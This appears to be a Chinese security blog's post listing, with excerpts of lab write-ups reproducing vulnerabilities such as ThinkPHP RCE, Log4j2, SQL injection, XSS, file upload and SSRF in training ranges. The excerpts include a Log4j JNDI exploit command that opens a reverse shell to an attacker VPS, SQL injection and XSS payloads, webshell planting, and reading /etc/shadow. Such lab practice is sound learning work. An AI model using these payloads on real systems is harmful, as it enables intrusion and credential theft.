- 博客(23)
- 收藏
- 关注
RSS订阅原创 PHP-FPM 远程代码执行漏洞(CVE-2019-11043)复现
切换目录到vulhub/php/CVE-2019-11043下。浏览器进行访问,成功复现,pwd可替换为其他命令。端口为:8080,访问网站,搭建成功。
2024-09-08 22:16:48
144
原创 ThinkPHP5 5-rce远程代码执行漏洞复现
其版本5中,由于框架对控制器名没有进行足够的检测,会导致在没有开启强制路由的情况下可执行任意方法,从而导致远程命令执行漏洞。我们知道了一定存在index.php这个文件,那么我们就对其进行修改为一句话木马的样式。由于存在过滤,需要用到base64加密来使我们的一句话木马上传成功。成功回显出aabb,说明是加入到了index.php里了。开始用蚁剑,URL地址填写我们一句话木马的位置。端口为:8080,访问网站,搭建成功。1)输出关于 PHP 配置的信息。将一句话写入index.php。
2024-09-08 22:12:45
366
原创 ThinkPHP5 5.0.23-rce远程代码执行漏洞复现
其版本5中,由于框架对控制器名没有进行足够的检测,会导致在没有开启强制路由的情况下可执行任意方法,从而导致远程命令执行漏洞。通过echo命令写入 Webshell 文件,首先将一句话木马进行Base64 编码。判断是否存在漏洞:访问/index.php?s=captcha页面,会出现如下报错。切换目录到vulhub/thinkphp/5.0.23-rce下。使用HackBar 插件发送 POST 请求。端口为:8080,访问网站,搭建成功。访问shell.php,使用蚁剑连接。
2024-09-08 22:05:37
252
原创 vulhub靶场log4j2漏洞复现
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,[ 经过 base64 编码后的命令 ]}|{base64,-d}|bash" -A [你的 vpsip]开始反弹Shell准备 JNDI-Injection-Exploit 下载地址并构造PayLoad如下...启动!拿取JDK1.8并构造Payload且直接访问..可以看到⽹⻚被重定向到了我们的恶意类⽹址。漏洞编号:CVE-2021-44228。
2024-09-08 22:01:09
327
原创 中间件解析漏洞
IIS6.X在iis6.x中,.asp⽂件夹中的任意⽂件都会被当做asp⽂件去执⾏在iis的⽹站根⽬录新建⼀个名为x.asp的⽂件 ,在x.asp中新建⼀个jpg⽂件。内容为<%=now()%> asp代码在外部浏览器中访问windows2003的iis⽹站中的2.jpg 发现asp代码被执行将2.jpg⽂件放到⽹站根⽬录下访问,发现其中的asp代码没有被解析。由此可⻅.asp⽂件夹中的任意⽂件会被当做asp⽂件去执⾏.⽅式⼆:畸形⽂件解析在IIS 6 处理⽂件解析时,分号可以起到截断的效果。
2024-09-05 20:04:21
750
原创 9.4课堂靶场练习
这里我们看到了有一个用户Tomato的uid为1000(我们linux主机创建的第一个用户的uid为1000),且它的shell为/bin/bash(说明可以分配终端),再结合我们前面扫到的2211远程连接端口,说明这个用户是可以被远程连接的,我们知道了用户名,知道了端口号,知道了ip地址,就差密码就可以远程连接这个靶机了,既然前面可以看/etc/passwd,我们也可以看一下/etc/shadow文件,这样密码也知道了。可以发现我们用一句话木马代替了要连接的用户名,构造了一个错误的连接。
2024-09-04 14:43:43
282
原创 文件包含PHP伪协议利用方法
cmd=php://input使用bp抓包工具抓取数据。先准备一个123.php的用来接收参数的网页。⽤途:可以访问请求的的原始数据的只读流。在 php.ini ⾥有两个重要的参数。我们用它来读取123.php本身。php.ini参数设置。⽂件的绝对路径和⽂件名。使用它去读取一个文件。
2024-09-03 20:29:46
298
原创 pikachu文件包含漏洞
看来是能够读取文件的,我们构建一个带有<?使用filename参数去读取它。我将它放在了网页同级目录下。提交之后观察网址上的参数。打开靶场,点击任意选项。
2024-09-03 19:52:59
286
原创 hackme靶机
进入主页发现是登录页面,没有用户名及密码,但是页面有注册链接,进行注册用户。使用md5解密方法进行解密superadmin用户的密码。不断的测试发现172.16.1.182是目标。用sqlmap验证是否有sql漏洞。先使用kali中的nmap工具。2.使用所注册的用户登陆成功。登录后输入' or 1=1#使用御剑典藏版扫描他的目录。登录解密后的超级管理员用户。复制链接地址使用蚁剑连接。查看users表中的列。
2024-09-03 19:27:57
339
原创 文件上传漏洞靶场
本关查看源码,发现文件上传后会在临时目录下,检测出不符合规则直接删除,但是上传和删除之间有一点点的间隔,我们可以在这个间隔中搞点事情,例如将上传的.php文件修改成可以写一句话木马的脚本,只要在间隔中打开文件,它就会生成一个木马文件,系统只会判断上传的文件,不会判断生成出的文件。这么看来的话,php是不能上传了,只能上传图片马了,而且需要在图片马没有被重命名之前访问它。上传图片马失败,发现本关会删掉图片内多余的内容,图片马没有用,只能使用反二次渲染的图片。这里还是将前一关的代码插入图片作出图片马。
2024-09-01 21:08:09
811
原创 ctfhub Web SSRF
修改URL编码后的数据包,同POST请求一样,将%0A全部替换成%0D%0A,在请求末尾添加%0D%0A。修改编码后的内容,将%0A全部替换成%0D%0A,在请求的末尾加上%0A%0D。访问题目链接后发现没有提交按钮,需要自己在网页源码进行添加按钮。二次编码后,将gropher请求头编码后的‘:’和‘/’还原。尝试访问,提示不能访问127.0.0.1。输入以下语句访问flag.php文件。结果如下,在8314端口找到flag。将数据包内容进行URL编码,将编码后的内容输入url框中。在浏览器中验证该端口。
2024-08-27 20:30:41
336
原创 XSS-labs
onfocus事件在元素获得焦点时触发,最常与 、 和 标签一起使用,以上面图片的html标签为例,标签是有输入框的,简单来说,onfocus事件就是当输入框被点击的时候,就会触发myFunction()函数,然后我们再配合javascript伪协议来执行javascript代码。可以看到这是用户输入的name变量,那么我们就猜测该位置会不会有XSS漏洞呢,也就是反射型的XSS,执行我们自己输入的前端代码。可以看到,想象中的结果并没有出现。
2024-08-25 15:19:34
490
原创 pikachu练习
alert('1')</script> 成闭合并弹窗。输入666' "<>&,查看显示结果和页面代码,我们可以看到’”<>都进行了编码。输入<script>alert('1')</script>发现被过滤了。查看提示登录后输入<script>alert(1)</script><sCRiPT>alert(1)</ScriPT> 用大小写来弹窗。输入<script>alert(1)
2024-08-22 18:56:17
426
原创 SQL手工注入漏洞测试PostGREsql⼿⼯注⼊
判断闭合类型输入and 1=1正常,输入and 1=2 判断为数字型。order by 4正常5错误,证明有4列。加单引号发现只有中间的两个回显位有回显点。
2024-08-20 16:13:10
128
原创 oracle手工注入
查users表中的数据,该靶场为手工注入靶场,sqlmap跑不出来。and 1=1正常 and 1=2不正常此处存在sql注入。查当前库--current-db。查表-D SYSTEM。
2024-08-20 15:48:32
141
原创 MSSQLILABS靶场
1,把msssql注入的靶场压缩包解压仿佛靶场根目录下。2将config.asp的内容改为以下的数据库连接语句。查表test -D test。将网址输入到sqlmap去检测。1,寻找注入点,字符串后。得到users表中的数据。访问IIS绑定的首页。sqlmap工具注入。
2024-08-20 15:15:56
223
原创 access手工注入靶场(附环境搭建)
判断字段列数,输入order by 4正常 ,输入order by 5 不正常,判断为4列。输入id=1 and 1=2 union select 1,2,3,4 from admin。将错误发送到浏览器改为‘True’ 将启用父路径改为‘True’将靶场的压缩包解压到当前的根目录下(一键三连截图私聊发靶场压缩包)访问IIS服务器绑定的IP地址,即可访问网站靶场。点击服务器主页下的IIS下的ASP。输入id=1 and 1=1正常。先在电脑的搜索框中搜索IIS。点击应用池下的网站的高级设置。
2024-08-20 14:16:02
145
原创 sqli-labs
输入 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+ 获得列名。通过union select 1,2,group_concat(id,username,password) from users--+获取表内所有元素。id=1 order by 3--+结果正常,而4不正常得回显位为3。
2024-08-15 22:30:28
912
原创 手工sql注入
1.配置靶场环境:将靶场文件解压到www下的网站根目录:启动小皮将php版本改成5.4.45,否则版本不兼容弄,靶场打不开。在浏览器中访问网站1.确定攻击点 确定网站可以注入的参数 比如:?id=?ID=?a=?sd=2.判断闭合方式 ' --+3.判断字段列数 order by,order by 5 和4页面不正常,说明列数小于4最终得出页面有3列4.联合查询 查当前数据库名,数据库版本,数据库用户。
2024-08-14 21:51:19
269
原创 ctfhub-web-信息泄露
在使用它之前要先在该脚本根目录下打开终端输入sudo apt-get install perl libio-socket-ssl-perl libdbd-sqlite3-perl libclass-dbi-perl libio-all-lwp-perl 命令,然后输入./rip-svn.pl -u 网址/.svn(./是运行程序。依旧利用ls-al找到.git隐藏文件,在git文件外执行(在.git文件内无法执行) git stash list和git stash pop两条语句,得到一个txt文件。
2024-08-13 23:10:14
970
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人